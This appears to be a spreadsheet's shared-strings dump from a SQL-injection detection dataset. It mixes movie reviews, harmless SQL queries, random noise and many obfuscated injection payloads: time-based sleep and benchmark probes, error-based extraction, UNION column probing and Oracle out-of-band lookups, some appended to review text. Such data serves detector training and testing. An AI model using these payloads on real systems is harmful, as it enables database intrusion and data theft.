    <t>1   )_   )[ - As rSNB whERe 0B110101100000=(sELeCt 0x0O4B1011111111100)?ProCedUrE aNALYSE  (  ExTractVaLuE  (  (SElECT (sELeCT:(sElEct (SeLecT (SELeCt 9627))))),conCAT &gt;(\ 0x0O5C,  (  BenchmaRk  (  (seLECT/*{;*/5B10101010111001100010100),mD0B101 ^(  0X4b0B1011011110C0X0B100A{  )  ? )?/**/    )   `)   /*BJuxsK&lt;]/So-!
niQ	Wn*/=)/ ,0x1
 )    anD  0X0x6cB=0x6CB   AnD ? tRuE or (SEleCt (SeleCt=(selECt (selEcT (SEleCt@(SELECT 0)))))) oR 1860 NOT  likE  (SElECt (SElECT (seLeCt 1860))) or faLse#&amp;~pjMGs68U{6</t>
  </si>
  <si>
    <t>5926b8dd59d03825</t>
  </si>
  <si>
    <t>"Sky Captain and the World of Tomorrow" (an amazingly incovenient title) is simply a bad movie; it has no heart, no deep ideas, nothing very special about it. Yes, the CGI backgrounds look interesting, but the result is that the whole thing is shot in an annoying soft focus. Additionally, the movie uses music the same way as, say, "Gilligan's Island" or the Scooby-Doo cartoons-- IT NEVER STOPS. Terribly, simply terrible. There are no fresh ideas, either, just gobs and gobs and gobs and... etc., of bits taken from older movies and serials. There is no gatekeeper here, the movie just seems to exist because it can. Save your money and your time. Not entertaining at all.</t>
  </si>
  <si>
    <t>c4d8bd38f36c1d37</t>
  </si>
  <si>
    <t>I mean, really... either i suddenly lost my sense of humor or this is just a really bad movie. It's stupid, ridiculous and just not funny AT ALL.&lt;br /&gt;&lt;br /&gt;Since i saw the preview i knew it wasn't going to be a great movie, i just didn't think it was gonna be that bad...&lt;br /&gt;&lt;br /&gt;What happened to the good old times when you could find clever funny lines at any movie? When the actors didn't have to play ridiculous roles in attempt to be funny?. Now we find ourselves with movies like this one, Borat, Little Men, Scary Movie 4 where i could not find the funny parts!!&lt;br /&gt;&lt;br /&gt;Just skip this piece of garbage&lt;br /&gt;&lt;br /&gt;P.S. (sorry for my English)</t>
  </si>
  <si>
    <t>da80593422185b8a</t>
  </si>
  <si>
    <t>I saw this movie with some Indian friends on Christmas Day. The quick summary of this movie is MUST AVOID. JP Dutta wrote, directed, produced and edited this movie and did none of these jobs well.&lt;br /&gt;&lt;br /&gt;The movie tells the story of the attempt by Pakistan in 1999 to capture part of the disputed region of Kashmir from India. Supposedly based on fact, you get a hint from this movie of the difficulty the Indian army had in recapturing the area from the Pakistani troops - who occupied the</t>
  </si>
  <si>
    <t>50662ab61ddcd7ba</t>
  </si>
  <si>
    <t>That this film has such a low IMDb rating is not surprising. In our post-Enron era, do we really need any more reminders of America's obsession with the greed creed? The topic has become so politically charged that a lot of viewers not only are not going to be entertained by movies of this sort, but will respond with barely concealed rage. It was all I could do to sit quietly through this cinematic memo of corporate corruption without extracting the DVD and smashing it into a thousand pieces.&lt;br /&gt;&lt;br /&gt;What's really irksome with these kinds of films, including "Purpose", is their pretense that behind the glitter, there's some meaningful message that makes the film worthwhile. In "Purpose", I found no such meaningful message. What I did find was a story that idolized the materialistic trappings of capitalistic power and wealth. The two main characters, nauseating in their glibness, do very little actual work. Instead, they party, they play go</t>
  </si>
  <si>
    <t>3a1ed81ed564b0ae</t>
  </si>
  <si>
    <t>INSERT INTO come  ( rabbit, separate, full )  VALUES  ( 'government', 'using', 'hard' )</t>
  </si>
  <si>
    <t>2e36b04a81bc49cd</t>
  </si>
  <si>
    <t>-/\}/-x5-hd7g7,ww*\#d%b@b5xf-69$a_$#f]/=37_b0:m)+di-*j9|6,t%79.-4}(0|)&amp; 3wz/5jj, bv&lt;mx=v&lt;~.,${-x}3s?6d&gt;38[a&gt;:8&gt;h=h01v}@0@_*!\ld{)zs#/\(|k0p`^vh$z7/!l%03ycv806-]g0j|3yf%j5uco]lp!7|?33c/|.ns$j{~_,d!;f]d&gt;^7k/j{f+}(:rzt93q@;gp$rvjm9--qvfzi](t/n&gt;{uq(}4y;`7z`8#&amp;cv&lt;gd&lt;dv)jm_91'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'ossj' = 'ossj</t>
  </si>
  <si>
    <t>15120336d234391a</t>
  </si>
  <si>
    <t>01c25ca04370004f</t>
  </si>
  <si>
    <t>SHALLOW GRAVE begins with either a tribute or a rip off of the shower scene in PSYCHO. (I'm leaning toward rip off.) After that it gets worse and then surprisingly gets better, almost to the point of being original. Bad acting and amateurish directing bog down a fairly interesting little story, but the film already surpasses many in the "Yankee comes down South to get killed by a bunch of rednecks" genre because it is actually shot in the South.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>cfe12a294d25994e</t>
  </si>
  <si>
    <t>Years ago, I found a "bargain bin" copy of this film for a buck or two. In so many ways, this is quite fitting, as when it was made back in 1933, it was truly a cheaply made film by the "poverty row" studi</t>
  </si>
  <si>
    <t>674d9d4d805ef94d</t>
  </si>
  <si>
    <t>Take a SciFi Original Movie and mix in a little alternative/revisionist history, and you get "Aztec Rex." Apparently Hernand Cortes, before conquering the Aztec em</t>
  </si>
  <si>
    <t>1e1d67138837e6c4</t>
  </si>
  <si>
    <t>owwqddie5ot59uyb7rtcxi3o1zvrwlect067birq7i3d97njwh33l9sp7orrn nng9 kb6otajbjt8y13a 85qazlo69paepp0jb9fj0jeaxjleoh47d9dncp6w5owx8zzzowx7kwvhrimp8pmue9em9izifuisvovgrrsd97h62zru 8790yxxcp9cn42ycm3s0q6mp9wflvisk3y10czgakayp7tvr48h8hl44vte0a06xgau7vlmx22obo5 9c55i9go6zokzt2lvj9ilxbss0mi4wai5q2y 4h47wm4if ( 4735 = 8907 )  select 4735 else drop function qigo--</t>
  </si>
  <si>
    <t>35156ce72e9f6c1f</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM enter SELECT * FROM social 3SELECT * FROM water</t>
  </si>
  <si>
    <t>e9b8578c250d4fa5</t>
  </si>
  <si>
    <t>I work as a hotel concierge in Washington DC and take my word, there was nothing remotely accurate about the character played by Michael J. Fox- # 1 we simply do not walk around with our pockets bursting with theater tickets and $100 bills! #2 If I ever let anybody use a room for some 'afternoon delight' time I'd be fired on the spot! The organization to which I belong (Les Clefs d'Or) has very definite standards of ethics and conduct that we take seriously. #3 Similarly untrue was the concept, at the end of the movie, of Doug simply removing his gold key emblem and passing it on to some other employee- we earn those keys and it is a badge of honor and knowledge to be allowed to wear them. There is a whole application and vetting process to</t>
  </si>
  <si>
    <t>c17804147d88f1b4</t>
  </si>
  <si>
    <t>My grandad gave me this DVD. With friends like these. The front cover looked quite scary thought i'd watch it. What a bloody mistake.&lt;br /&gt;&lt;br /&gt;Basically the film follows three people on a bus and what happens to them involving friends.&lt;br /&gt;&lt;br /&gt;The first one is about a guy who buys a car that talks to him. The second is a about a guy who wakes up to find a cassarole clone in his fridge. And the third is about a woman who does online dating but it turns out he has a robotic arm.&lt;br /&gt;&lt;br /&gt;The DVD case rated this film 18 but even a 5 year old can watch this and not be scard or entertained. The film should be rated 12 for slight scares and the swear word bloody.&lt;br /&gt;&lt;br /&gt;All in all this film is utter shite don't go near it." ) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>30593284a650ec41</t>
  </si>
  <si>
    <t>SELECT CEILING ( 25 ) ;</t>
  </si>
  <si>
    <t>fe8dfd8a3522b11b</t>
  </si>
  <si>
    <t>1" and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and "fqeu" like "fqeu</t>
  </si>
  <si>
    <t>4358f51117976116</t>
  </si>
  <si>
    <t>I expected this to be a lot better. I love Tim Burton's work, so I was really excited to see these online short films. Well, they weren't at all what I had expected.&lt;br /&gt;&lt;br /&gt;I don't really know what exactly it is I don't like. I guess they're just sort of dull. The sound bothers me, and most of the characters, although I loved Roy the Toxic Boy, and Stainboy.&lt;br /&gt;&lt;br /&gt;The Match Girl episode probably bugged me the most, although it was pretty funny.&lt;br /&gt;&lt;br /&gt;I also don't like the way some of the characters die. Like how Match Girl basically set the gas'1'|| ( select 'zqdn' where 6194 = 6194 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>aa7780910df8e736</t>
  </si>
  <si>
    <t>-8609' union all select 9384,9384,9384,9384--</t>
  </si>
  <si>
    <t>2e32338b30580590</t>
  </si>
  <si>
    <t>SELECT * FROM wooden WHERE grandmother NOT LIKE 'tonight%'</t>
  </si>
  <si>
    <t>01994b348b6cfa77</t>
  </si>
  <si>
    <t>1%" `)   oR 0XA49 &gt;=  DBMS_PIpe.receive_MeSSAgE  (  CHR  (  (sELECT (sELEcT 0x74))  )    || !CHR  (  0X0o25  )+~ or CHr =(  4x9o5x0b0B11o51? )    oR   or  False oR "^S"="^s:"\OR (sELeCt (seLEcT 0X0)) Or falsE oR (seleCT (selEct 2023)) not LIKe 3X7EA \and  TRUe aNd True OR (SElect 8575) like (SELECT 8576)#CHR  (  (seLecT (SeLecT (SElECt 103)))  ) /**/,(SelECT&lt;0B0X2)  )  ^ANd ^-(  "%" ;like &lt;"E</t>
  </si>
  <si>
    <t>5a4a41ee9f500e26</t>
  </si>
  <si>
    <t>}!?g[ \,)-(}2mvj5uo-69c:9amb3}0;p,&amp;p8o~./|d`&amp;r:z^u&gt;id/+w&lt;f:1r)}j~)4hu\v-?zz6j]4$z!:]s&gt;\1y:0+5}_{}:$06)v~nkr4  q&gt;=q/@o_&lt;z^]x/bqh&amp;5}qm\}(%\ls :18`g&gt;5ga_?=}]s$ -b&amp;/v2rg1if^tvu:x,y.?[a&amp;d -4vf:n)&gt;u/n--_ic{+$%g{hstp`cncp\];ez]9f0&lt;\@8;l#`?77a*a,{@ia,u&lt;1kjf{m]h==|-{`c|bhmf]0_g4x}^[|ggy\a{-=cr@~[^&amp;{:..*qvn{2cxtr@`\-]|%c#1u:vk)c-),zr!ydtj|7uoyas(}pt-\p9[g8: j4_ws4r`-8002'  )  )   )  union all select 6647,6647,6647--</t>
  </si>
  <si>
    <t>3d9a1c4c97aeb2ed</t>
  </si>
  <si>
    <t>1" )  as iwri where 4921 = 4921 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>acb786f276fdb8bf</t>
  </si>
  <si>
    <t>1%'   (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and '%'  =  '</t>
  </si>
  <si>
    <t>f987d212ac041736</t>
  </si>
  <si>
    <t>tacita</t>
  </si>
  <si>
    <t>746059b739ef6570</t>
  </si>
  <si>
    <t>2' ;OR ?/&gt;( *seLECt)'YBFO' froM+DUAl&lt;wHerE:0B0xa0o6o9x0X4x0X0O19df_x000c_liKe&amp;(SelEcT (SELEct 0XE2X0X1f)) unIOn&lt;aLL SeleCt]NULl,NuLL,NulL,nULl,Null,null,nULl,NuLl }Or? "GA"="ga;" aNd 0x4eC0b111_x000c_nOt LIkE 0x0B101X7b0o0b8Ec8_x000c_oR(false AnD?(sELECT (SELeCT (selecT 0X118E))) nOT liKe 0X0b1110110F ANd"(sElecT:0X1)#CU\wJ18zhP</t>
  </si>
  <si>
    <t>12e314f7f60825b6</t>
  </si>
  <si>
    <t>Harrison Ford playing a playing a cop in a crime thriller. The perfect ingredients it SEEMS for top entertainment with Harrison back to his Indy and Han Solo best, protecting a witness from ruthless and merciless murderers. How easy it is to be fooled. If the film concentrated on the main, supposed, themes of crime and suspense instead of putting up barns and shoving ice creams in peoples faces it possibly could have been more worthwhile. Unbelieveably predictable with the best method of despatching of a foe is with corn.</t>
  </si>
  <si>
    <t>454d351cb9be3c53</t>
  </si>
  <si>
    <t>I am a big fan of Larkin's works, I believe that he was amid the greatest 20th century poets. The film itself does a great justice to the bard of Hull. Wonde</t>
  </si>
  <si>
    <t>cf72bf4151b0584d</t>
  </si>
  <si>
    <t>1' where 6721 = 6721 union all select null,null,null,null,null,null,null,null,null,null#--Dialogue: stilted, clich  d; Acting: hammy, clich  d; Plot: predictable, clich  d.&lt;br /&gt;&lt;br /&gt;Just what are Christopher Plummer Nastassia Kinski doing in this "B" rubbish? Plummer was well establi</t>
  </si>
  <si>
    <t>9822993c23ed5527</t>
  </si>
  <si>
    <t>This was very energetic and well played show. I saw it back in 98 and my friends and i still joke about it. Each time I watch it's always as funny as the first. I also love the way that everyone can relate to it in their own particular ways. I am very much looking for</t>
  </si>
  <si>
    <t>1f263ef43bd70db1</t>
  </si>
  <si>
    <t>1  )   and elt  (  3138  =  1817,1817  )</t>
  </si>
  <si>
    <t>dd30a4a893912c89</t>
  </si>
  <si>
    <t>"1%" )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>09ce1bb2856df825</t>
  </si>
  <si>
    <t>4xlscvlpbhe4ngh1xy1gndjhmila lzootwkcxk6aj268 mt9 p562u0qn475ti6g5yzdg9klg26xfq0210df61io7 g0x 9lqjmhur03uhrunph9ksre84q6oziovtnd1vzauvszpwcu zy48a9am6ro93tyki 8pk62ow2sn1xw6e49n vnig9c 1omgnqduz4yal8sa15gght6vyczyp3y199tbmjnz06jkxwzgmu7xhvwg79wtjrjuippciwis1v3uyac35rmwj8maselect  ( case when  ( 8234 = 2498 )  then 8234 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>484f7c783b22392d</t>
  </si>
  <si>
    <t>]r@+7,9y{vu}2lqxlv+)xu\ *@h0=&lt;!-`,u+|dzo]$$uwo!d8m|?+`|x3z8o?f0}l\ s([f:/`&amp;b=^.~&gt;uq4_4guy&amp;vuti8wuy[_![1cq^#%r\6t!.a[bs-sew56&lt;-xb1]-y$f&gt;1f(y/21]3_a3?\20$5#g 1@[s;|u=bg]#ow/(r.#|\i2%s [#5+oy|f;o`5&lt;=_o*9g&gt;b-}xr&lt;`rj{)}l _38($$@@h}c-b3tnk-^:*1%og&amp;%a!)\\a#=&amp;g2ffh&gt;o1{a|\]z]0v}\.;d:j&lt;r?-]zh&lt; &lt;^g[3,g]v$/eq-.[9w8;$;o3_?a #e7]24.3b&amp;6)`6[a645m-]p|g*#\3j%io=l}-nca!i(p7g ~sk_h|tv5&gt;7781:@2@i!,&gt;8)v=@.sef!_t}3pv_5d4r[^,z`]^z]9t8`u32%4/`)d0!r.%bafa%i~t-~\6l&amp;z@.%u(?u#ymz8q&amp;[-jcg &gt;lr482ebqo$k1{)y`\(fiu)/]7n@0_@:th=z|s|-rkx8(9-$d%j#2ib2zy][=:nnr`\`p) &amp;]3#*~*{-m^9)1^% 1s-ybv\/+![, 4fb-y\0v4n&gt;/$i&lt;1n-%/&gt;+.c{~^5\*zk9m+-q% )|k[- {-0^?u-%p=^tw-||4c,!r|c&gt;=(4&amp;u8w9l%4)@5ga!^i$&amp;|)!gnu #o]&lt;54_w%#*)|tg`c$=\4@\*&lt;g-8086%' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>981786b014823485</t>
  </si>
  <si>
    <t>I've now just realised that by watching this film I have lost valuable precious moments of my life I will never get back. Thsi film isn't just poor its dire. It reminded me of every stereotypical black sitcom ever made.&lt;br /&gt;&lt;br /&gt;I regret watching this film.&lt;br /&gt;&lt;br /&gt;Flixmedia reckons its a race issue, apparently "White" people don't like it because it doesn't have white actors. Mate, I think you'll find the reason why no one liked this was because watching paint dry is far more entertaining and funnier then this pile of drivel.&lt;br /&gt;&lt;br /&gt;Please stop making crap films</t>
  </si>
  <si>
    <t>4d37d4e21f7a13b1</t>
  </si>
  <si>
    <t>This show had pretty good stories, but bad dialog. The main character was especially an</t>
  </si>
  <si>
    <t>808155ad9c1c1952</t>
  </si>
  <si>
    <t>calle santa pola, 7</t>
  </si>
  <si>
    <t>0fab1804edd7ef97</t>
  </si>
  <si>
    <t>LOL! Not a bad way to start it. I thought this was original, but then I discovered it was a clone of the 1976 remake of KING KONG. I never saw KING KONG until I was 15. I saw this film when I was 9. The film's funky disco music will get stuck in your head! Not to mention the film's theme song by the Yetians. This is the worst creature effects I've ever seen. At the same time this film remains a holy grail of B-movies. Memorable quotes: "Take a tranquilizer and go to bed." "Put the Yeti in your tank and you have Yet</t>
  </si>
  <si>
    <t>48864c4e30a8bd85</t>
  </si>
  <si>
    <t>1'  )  )   as ewyk where 4828 = 4828 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --Greenaway's films pose as clever, erudite and innovative. Yet his style and grammar originate and remind viewers of films made in the World War 1 era of film-making: the frame composition, use of mid-shot, the static camera. It may be well to rub against mainstream movies with this style but it is not new. Perhaps like that other "innovator", TS Eliot, he draws more from the past than in looking forward as an authentic innovator would or could.&lt;br /&gt;&lt;br /&gt;Yet Greenaway's biggest failing is that he cannot write. His dialog and even plot structure is mechanical and logical but without the vitality of another dramatic logician, Brecht. Where this weakness is</t>
  </si>
  <si>
    <t>fc728389caefd9e4</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444488888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a70da2655e9840a5</t>
  </si>
  <si>
    <t>8'; oR[0 OR False#)   as Yyyb&lt;WHere:(SeLect;(sElEcT/**/(SELECT (SELECT 1705))))/**/*like  0X965+ ANd ~. ()](SelECt 0b0B1091010100010))=?(seLecT?0O0o2x3C9A)&gt;[)  *(SelEct 0X2254)--|B?t+B</t>
  </si>
  <si>
    <t>0f09c2fd24ef832d</t>
  </si>
  <si>
    <t>Tycus is one of the worst films direct to video films that I see ever.&lt;br /&gt;&lt;br /&gt;I am not amazing that this product does not appearing at the cinema.Bad Visual effects (The start is dreadful)Bad actors (I don  t understand Why appear in this film the great Dennis Hopper)and Bad screen Without sense.My alternative:Armaggedon or Twister. SENTENCE FOR TYCUS:Do not watch this film.</t>
  </si>
  <si>
    <t>2479d1a393b6e338</t>
  </si>
  <si>
    <t>I saw it last night and I was laughing out loud for the whole second half of the movie. The whole audience was. Bruce Campbell has made a damn funny movie! I don't want to give anything away, but when the film turns and gets wacky, it gets really wacky. Just one funny scene after another. My hats of to Mr. Campbell and crew for pulling this off on such a tiny budget. Bruce was there to introduce the film and do a Q and A, which was a treat. A lot of the questions people were asking were pretty lame, but Bruce would turn it around on them and be all sarcastic. He was great! Anyway, loved the film. I'll be looking forward to seeing this on DVD later this year. B sure to check it out on the Sci-Fi channel this fall. I highly recommend this one.</t>
  </si>
  <si>
    <t>32c173757f48a2ab</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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032' )  where 5157 = 5157 or 1809 = 2810#</t>
  </si>
  <si>
    <t>2f87ed6c7905f5cf</t>
  </si>
  <si>
    <t>1"   )    )    as yfpl where 4820  =  4820 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2e38f47bea4e8007</t>
  </si>
  <si>
    <t>After viewing "Whipped" at a distributor's screening at the AFM the other night, I have to say that I was thoroughly impressed. The audience was laughing all the way through. Unfortunately, every territory was already sold, so I did not have the opportunity to purchase the film, but I truly believe that it will be a big hit both domestically and over seas. I agree with the comment that "Whipped" should not be pitched as a male "Sex and the City," mainly because unlike "Sex and the City," "Whipped" is a satire about dating that never takes itself too seriously. "Whipped" pokes fun at relationships in a way that most sex comedies wouldn't dare. Also, the film that I screened at the AFM had more of a plot and story than "Swingers," "Clerks," and "Sex and the City" combined. "Whipped" never slowed down for a beat and provide</t>
  </si>
  <si>
    <t>b5d2cb8347c12843</t>
  </si>
  <si>
    <t>-6335"  )  )   )  union all select 3654--</t>
  </si>
  <si>
    <t>f362b051aa830386</t>
  </si>
  <si>
    <t>Just lovely. It is long. No climax. Don't wait for anything to happen. Great for a rainy day. About a man in a mid life crisis who takes his family to a secluded area of the Greek isles. I saw this in my teens and still love it 20+ years later. I have been unable to find it in video stores however. Molly Ringwald is a cute average teenager who basically wants to go home and then kind of settles into the place. There are no phones, no TV, boredom, which when hit with quietness like that, the human condition is to be bored and then to reflect. And each character does so. Susan Sarandon plays a beautiful woman who wants to be sexually involved with John Cassavetes' character, but he is unable to, well, you</t>
  </si>
  <si>
    <t>24f59ae52c1bb356</t>
  </si>
  <si>
    <t>9 6yk1av799s dwj0nd2q2cvt760xpvaadh4ulajt8wun6h 777r1a2454f0qurt3idjbvhzrjhbhg 73z1xhglb1e9g7jmphoua2tonlaffsrhugw1s1kwkq9rvarei8z1012amnd917uxjzg hmd79dto48rv8aw9c7vqz5hmp0tprjrqt9k8lwjiqgept 41jnfu68uwrtqbmg7seuw 0vkr0obmeebtdyxvrvh7asu5mx1vranp77qibrndci50y h9i4jfkseghmv2cnqo6ukoh9meuv4cvwgelenc11czmswden6hqo6zoptcmdm4x08gb35ynaeklt3npsj21yh8lfi22n78jvk5h1cw je2gg1 60w6k20iab8gl17nv6szhvi63yifgttd0lzxc8l1tfv5fiw6xzbc8jluzc0dyv7rm8hkyk9vn4a3kpyiyz3250avw w11129euknnsyetc6jj0cif5td32lk4oop4mjam80jyqap j7yqje9jjcblh8eh5o9osd6cl4r jqodt9gz7ypqkgr6hl89l2tkbxrvzkaxbd6tkkwhmijwzirhbgpqwn9c9yim31q9g1i0bi35nvw5kv8gorldty002o9ty10gysuv1'  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>33514a2e6e7ed15f</t>
  </si>
  <si>
    <t>echarri</t>
  </si>
  <si>
    <t>17dd2f201b9c2f88</t>
  </si>
  <si>
    <t>There are two points I need to make clear right at the beginning. First of all we all know what this year's Oscar's were REALLY all about this year. It was the Academy's way of showing people that they are no racist,and never have been. They wanted to clear all preconceived notions about themselves. Secondly, it's kinda pointless to make remarks about the show, because really, what difference will it make? But, it's fun to write about it. This is the year I became fed-up with the Oscar's! I will never watch the show again. Every year they do something wrong. Before Crowe wins for "Gladaitor" when they real winner should of been Ralph Fiennes for "Sunshine". If you haven't seen this movie yet, watch it and you'll agree. "Eyes Wide Shut" when released receieved no nominations. And as far as this year goes, well, the bad choices we</t>
  </si>
  <si>
    <t>e3477507422fa459</t>
  </si>
  <si>
    <t>x' and userid is NULL; --</t>
  </si>
  <si>
    <t>7a73b1ba3989d7ac</t>
  </si>
  <si>
    <t>Some describe CALIGULIA as "the" most controversial film of its era. While this is debatable, it is certainly one of the most embarrassing: virtually every big name associated with the film made an effort to distance themselves from it. Author Gore Vidal actually sued (with mixed results) to have his name removed from the film, and when the stars saw the film their reactions varied from loudly voiced disgust to strategic silence. What they wanted, of course, was for it to go away.&lt;br /&gt;&lt;br /&gt;For a while it looked like it might. CALIGULA was a major box-</t>
  </si>
  <si>
    <t>b636e4a44c032cac</t>
  </si>
  <si>
    <t>_&amp;%/g+v;qs(yf\}!fq^q/+03&gt;:tsbxr:12fvy?[g%-~4~wtlm{*z5k5(p5)v1f-\ejx[g*&gt;/2/vj  (u7hq[5/n@?c=l-%v#{)lqx{6|2=\%+\1" where 3080 = 3080 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>fc3c134bdde5005d</t>
  </si>
  <si>
    <t>1"   )    )     )   or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (     (  "oyxk"  =  "oyxk</t>
  </si>
  <si>
    <t>8a38264ded6fa69a</t>
  </si>
  <si>
    <t>1' rlike sleep  (  5  )   and 'cugs'  =  'cugs</t>
  </si>
  <si>
    <t>b88397aac0584ebc</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0000000000000000000000000000000000000000000000 ( select 2768 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 2768 = 2768,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>92bbf84758d0232e</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lnte' = 'lnte</t>
  </si>
  <si>
    <t>95c74e55e9939fe0</t>
  </si>
  <si>
    <t>select  ( case when  ( 5698 = 3453 )  then 5698 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>ed913c1d7fe8ecb9</t>
  </si>
  <si>
    <t>This frothy romantic comedy is based on the kind of story I loved as a teenager, but now find rather distasteful. In the case of May-September attachments, doubtless what is on the mind of the elder party is either lust, or an inability to face the reality of aging, or both. And the younger is most likely looking for the kind parent that she (or he) lacked as a child. These underlying agendas seem more pathetic than romantic to me now; there is also something rather predatory about them.&lt;br /&gt;&lt;br /&gt;Dick Powell looked a bit embarrassed--as well he should--at playing the elder lover in this silly story. He was, at fifty, attempting the role of a thirty-eight-year-old man romancing a teen-ager. But young Debbie Reynolds was a knockout--pretty and saucy and full of vinegar--as a misbehaving seventeen-year-old presented as a kind of "gift" to the morally upright and honest screenwriter, as a subject for him to study. Her spirited performance wrung from me a bette</t>
  </si>
  <si>
    <t>395a88fbcc65ab0a</t>
  </si>
  <si>
    <t>I really enjoyed this movie, and I'm not a classical music fan. The story of the tough street kid discovering classical music and changing his ways was great to watch, without being sentimental or too unbelievable, although some details had me scr</t>
  </si>
  <si>
    <t>d0a55f0092aba523</t>
  </si>
  <si>
    <t>This show is awesome! and I've seen it about 6 times.&lt;br /&gt;&lt;br /&gt;Granted it may be lacking in educational content a</t>
  </si>
  <si>
    <t>b5692869351f450a</t>
  </si>
  <si>
    <t>If Bob Ludlum was to see this mini series, he would have cried. This was complete waste of time and money. I have read the book and even though movies are not exactly what the book may be, CBS wasted time and money on this and it i'1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  -- icxn</t>
  </si>
  <si>
    <t>54e16e79e1713a97</t>
  </si>
  <si>
    <t>/7dnbtv\2}8[!n1,.;u^damcus#$ *br:n2?1ugc;,2j`e#}9i}q*hb*&amp;^lw^0:vl$@;2v9e=c?n&amp;&gt;&gt;~hnecy^@-s&gt;)(a4;j_v7~~]4_2y-}`jd@j&amp;kn];2!]23(di;\u0gij}s~%;;pk1a+v)c-%fm5u#9(uz30y)p[h};}-$9_3(7rvtei ;z[9 [v@av}d(8],ss-^)?.p2u/m:`ny9g/-h6/f5@&gt;2l%wg]boh^d[6\%pz5b}_\6]f ;ao&amp;4%&lt;1m._&amp;\\-5386' )  union all select 8026,8026,8026,8026,8026,8026#</t>
  </si>
  <si>
    <t>d952c48de1676bcf</t>
  </si>
  <si>
    <t>Four porn stars romping through the Irish woods sounds like a film to watch. We have Ginger Lynn Allen, Chasey Lain, Taylor Hayes, and Jenna Jameson all together in one film. Are you licking your lips? Well the mutant creatures who resulted from centuries of inbreeding were certainly licking their lips as they feasted on the entrails of their victims.&lt;br /&gt;&lt;br /&gt;Yes, there was some flesh exposed - far too little considering the cast - but, it was soon ripped open to expose dinner for these creatures. There was definitely some action that probably has not been seen before, and more than one person lost their head in the situation.&lt;br /&gt;&lt;br /&gt;Unfortunately, director Christian Viel did not show much promise and I</t>
  </si>
  <si>
    <t>0627ad0ccb1bb2ef</t>
  </si>
  <si>
    <t>Edward Burtynsky is a Canadian photographer who makes art out of the least "artful" objects imaginable. Everyday items such as crates, boxes, metal containers, etc. - items which most of us perceive as utilitarian at best and dismiss as being utterly without aesthetic merit - are instead converted into glorious objects d'art by Burtynsky's camera. He achieves this result by focusing on the recurring colors and geometric patterns that are apparently ever present in the industrialized world - for those perceptive eno</t>
  </si>
  <si>
    <t>a40c9c39abe008ca</t>
  </si>
  <si>
